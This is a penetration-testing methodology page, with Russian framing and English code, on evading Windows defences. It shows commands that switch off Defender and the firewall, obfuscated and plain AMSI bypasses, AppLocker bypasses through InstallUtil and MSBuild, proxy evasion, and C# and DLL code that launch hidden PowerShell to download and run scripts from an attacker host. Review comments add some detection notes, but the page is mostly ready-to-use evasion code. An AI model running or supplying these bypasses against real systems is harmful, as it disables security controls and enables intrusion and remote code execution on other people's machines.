
Обход защитных мер

:::tip Формат страницы

Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.

:::

Порядок действий

  1. Закрепите текущий уровень доступа и соберите контекст (ОС, сеть, домен).
  2. Минимизируйте шум: избегайте лишних действий за пределами согласованного scope.
  3. Документируйте команды и вывод для отчёта.
  4. Ниже — заголовки и примеры команд на английском.

Методика

Disable AV & Firewall

# Alternative 1
# Turns off several Defender components through the Set-MpPreference cmdlet:
# the intrusion prevention system, IOAV protection, real-time monitoring and script scanning.
# NOTE(review): Defender's Tamper Protection is the control designed to reject preference changes
# like these, and such changes are normally recorded in Defender's operational event log - verify
# both on the build being assessed.
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true

# Alternative 2
# Removes every installed signature definition with MpCmdRun.exe instead of changing preferences;
# the engine itself is not stopped by this command.
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

# Disables the Windows firewall for all three profiles (Domain, Public, Private); unrelated to AV but listed under the same heading.
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

Antimalware Scan Interface (AMSI)

# Alternative 1
# Obfuscated form of the reflective write shown in Alternative 2: the -f format strings assemble
# "System.Management.Automation.AmsiUtils", "amsiInitFailed" and "NonPublic,Static" at run time,
# and the final call sets that static field to $true. The backtick escapes and string splitting
# change the text of the script without changing what it executes.
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

# Alternative 2
# Plain form: finds the AmsiUtils type in the assembly that contains [Ref], selects the non-public
# static field whose name matches "amsiInit*ailed" and sets it to $true.
# NOTE(review): a detection keyed on the literal names in this line would not match Alternative 1;
# the common point of both variants is the reflective field write - confirm what script block
# logging captures for each on the PowerShell version in use.
(([Ref].Assembly.gettypes() | ? {$_.Name -like "Amsi*utils"}).GetFields("NonPublic,Static") | ? {$_.Name -like "amsiInit*ailed"}).SetValue($null,$true)

Constrained Language Enabled (CLM)

Alternative 1 - Metasploit

meterpreter> load powershell
meterpreter> powershell_shell

Alternative 2 - Csharp

// Console APP (.NET Framework)
using System;
// right-click the References folder in the Solution Explorer and select Add Reference
// Click on Assemblies menu (left-hand side) and look for System.Configuration.Install
using System.Configuration.Install;
// right-click the References folder in the Solution Explorer and select Add Reference
// select the Browse… button at the bottom of the window and navigate to
// C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
using System.Management.Automation;
using System.Management.Automation.Runspaces;
namespace Bypass
{
// Hosts the PowerShell engine in-process through System.Management.Automation instead of launching powershell.exe.
class Program
{
// Entry point: creates and opens a runspace, attaches a PowerShell pipeline to it, queues the script
// held in `cmd`, runs it synchronously and closes the runspace. `args` is unused.
// NOTE(review): `cmd` is a download-and-execute cradle over plain http with a placeholder host; nothing
// here reads ps.Streams or ps.HadErrors, so a failed download or a script error goes unnoticed.
// NOTE(review): Runspace and PowerShell are both IDisposable and neither is disposed here
// (rs.Close() is not a Dispose()).
// NOTE(review): for detection, the observable is a process other than powershell.exe loading
// System.Management.Automation.dll - confirm which module-load / engine-lifecycle telemetry is available.
static void Main(string[] args)
{
String cmd = "(New-Object System.Net.WebClient).DownloadString('http://<YOUR_IP>/shell.ps1') | IEX";
Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddScript(cmd);
ps.Invoke();
rs.Close();
}
}
}

AppLocker

Allowed store directories

C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing

Alternative 1 - InstallUtil

// Console APP (.NET Framework)
using System;
// right-click the References folder in the Solution Explorer and select Add Reference
// Click on Assemblies menu (left-hand side) and look for System.Configuration.Install
using System.Configuration.Install;
// right-click the References folder in the Solution Explorer and select Add Reference
// select the Browse… button at the bottom of the window and navigate to
// C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
using System.Management.Automation;
using System.Management.Automation.Runspaces;
namespace Bypass
{
class Program
{
// Console entry point. It plays no part in the installutil path: installutil.exe (see the /U command
// line after this listing) loads the assembly and drives the [RunInstaller(true)] class below instead,
// so Main is never reached that way and is free for other purposes.
static void Main(string[] args)
{
Console.WriteLine("Totatlly useless");
}
}

// Installer subclass picked up by installutil.exe. With the /U switch the tool calls Uninstall, so the
// placeholder body below executes inside installutil.exe's own process - presumably why it is listed
// under AppLocker here.
// NOTE(review): from a defender's view the observable is installutil.exe started with /U against an
// assembly in a user-writable path such as C:\Windows\Tasks - confirm the AppLocker/WDAC policy in force.
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
// savedState is unused; the override exists only because it is the method installutil invokes for /U.
public override void Uninstall(System.Collections.IDictionary savedState)
{
<YOUR_MALICIOUS_CHSARP_CODE>
}
}
}
C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\installutil.exe /logfile= /LogToConsole=false /U C:\\Windows\\Tasks\\clm.exe

Alternative 2 - MSBuild

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Inline-task project: CodeTaskFactory compiles the C# inside each <Code> element when MSBuild
     processes the project, so no separate executable has to be built beforehand.
     The "Hello" target runs FragmentExample first, then ClassExample. -->
<Target Name="Hello">
<FragmentExample />
<ClassExample />
</Target>
<!-- Task 1: Type="Fragment". The CDATA body is compiled as plain statements (here only a Console.WriteLine). -->
<UsingTask
TaskName="FragmentExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>
<Using Namespace="System" />
<Using Namespace="System.IO" />
<Code Type="Fragment" Language="cs">
<![CDATA[
Console.WriteLine("Hello From Fragment");
]]>
</Code>
</Task>
</UsingTask>
<!-- Task 2: Type="Class". The CDATA body is expected to be a complete class; the Reference element makes
     System.Management.Automation available to it. The body here is a placeholder.
     NOTE(review): defensively, the observable is msbuild.exe run on a project file outside a build
     environment (the page's example path is C:\Windows\Tasks\build.xml) - confirm which
     process-creation telemetry exists. -->
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
<YOUR_MALICIOUS_CHSARP_CODE>
]]>
</Code>
</Task>
</UsingTask>
</Project>
C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\Windows\\Tasks\\build.xml

Alternative 3 - DLL Bypass

PowerShell - CLM

//#include "pch.h"
#include <windows.h>

// Reference:
// https://docs.microsoft.com/en-us/windows/win32/dlls/dllmain
// https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-entry-point-function
// https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code

// DLL entry point. In this listing the attach path does nothing observable: the calc.exe launch is
// commented out, so si, pi and appCalc are unused and the function simply returns TRUE.
// NOTE(review): the `return TRUE` inside DLL_PROCESS_ATTACH exits before the trailing return; the other
// three cases break out of the switch and reach it. The actual payload is in the exported psh() below.
BOOL APIENTRY DllMain(
HMODULE hModule, // handle to DLL module (same as HINSTANCE)
DWORD fdwReason, // reason for calling function
LPVOID lpReserved // reserved
) {

STARTUPINFOA si = {
sizeof(STARTUPINFOA)
};
PROCESS_INFORMATION pi;
LPCSTR appCalc = "C:\\Windows\\System32\\calc.exe";

// Perform actions based on the reason for calling
switch (fdwReason) {

case DLL_PROCESS_ATTACH:

// A process loads the DLL (initialize once for each new process)
// Return FALSE to fail DLL load

// Start a "calc.exe" child process (disabled in this listing)
// if (!CreateProcessA(appCalc, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
// MessageBox(NULL, TEXT("CreateProcessA() failed\n") + GetLastError(), TEXT("Error"), MB_OK | MB_ICONINFORMATION);
// return FALSE;
// }

// MessageBox(NULL, TEXT("Hello, DLL is attached"), TEXT("Hi!"), MB_OK | MB_ICONINFORMATION);
return TRUE;

case DLL_THREAD_ATTACH:
// Do thread-specific initialization
break;

case DLL_THREAD_DETACH:
// Thread exits normally
// Do thread-specific cleanup
break;

case DLL_PROCESS_DETACH:
// A process unloads the DLL
// Perform any necessary cleanup
break;

}
return TRUE; // Reached for every reason other than DLL_PROCESS_ATTACH, which returned above
}

// Export function
//extern "C"
// Exported entry point named on the rundll32 command line after this listing (rundll32 testdll3.dll,psh).
// Starts powershell.exe through CreateProcessA with -exec bypass -w hidden -nop and a download-and-execute
// cradle against 10.10.10.4; appCmd is passed as lpCommandLine (lpApplicationName is NULL).
// NOTE(review): `TEXT("...") + GetLastError()` is pointer arithmetic on the string literal, not string
// concatenation - the message box shows the literal offset by the error code (possibly reading past its
// end) rather than the code itself.
// NOTE(review): pi.hProcess and pi.hThread are never closed with CloseHandle, and the child is not waited on.
// NOTE(review): detection angle - rundll32.exe loading a DLL from a user-writable directory (C:\Windows\Tasks
// on this page) and then starting powershell.exe with these switches; confirm against the process-creation
// telemetry available.
__declspec(dllexport) void psh() {

// MessageBox(NULL, TEXT("Hello from a DLL exported function"), TEXT("Hi!"), MB_OK | MB_ICONINFORMATION);

STARTUPINFOA si = {
sizeof(STARTUPINFOA)
};
PROCESS_INFORMATION pi;
LPCSTR appCmd = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -w hidden -nop -c IEX(new-object system.net.webclient).downloadstring('http://10.10.10.4/run.txt')";

// Start the powershell.exe child process described by appCmd (the comment in the original said "cmd.exe")
// if (!CreateProcessA(appCmd, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
if (!CreateProcessA(NULL, appCmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
MessageBox(NULL, TEXT("CreateProcessA() failed\n") + GetLastError(), TEXT("Error"), MB_OK | MB_ICONINFORMATION);
}

}
C:\Windows\Tasks> rundll32 testdll3.dll,psh

Powershell Proxy Evasion

# Creates a WebClient, sets its Proxy to $null so the request is made directly rather than through the
# configured system proxy, and fetches the script text from the placeholder host.
# NOTE(review): where egress policy expects all HTTP to pass through the proxy, a direct connection like
# this is itself an anomaly worth alerting on - confirm against the proxy/egress logging in place.
$wc = new-object system.net.WebClient; $wc.proxy = $null; $wc.DownloadString("http:/<YOUR_IP>/shell.ps1")

Just Enough Administration (JEA)

# Smallest function shape shown for the JEA section: runs whoami and writes its output to the host.
# NOTE(review): presumably this stands for a function exposed through a JEA role capability; the
# capability file and session configuration are not on the page, so how it is exposed is not shown - confirm.
function CommandName { whoami | out-host }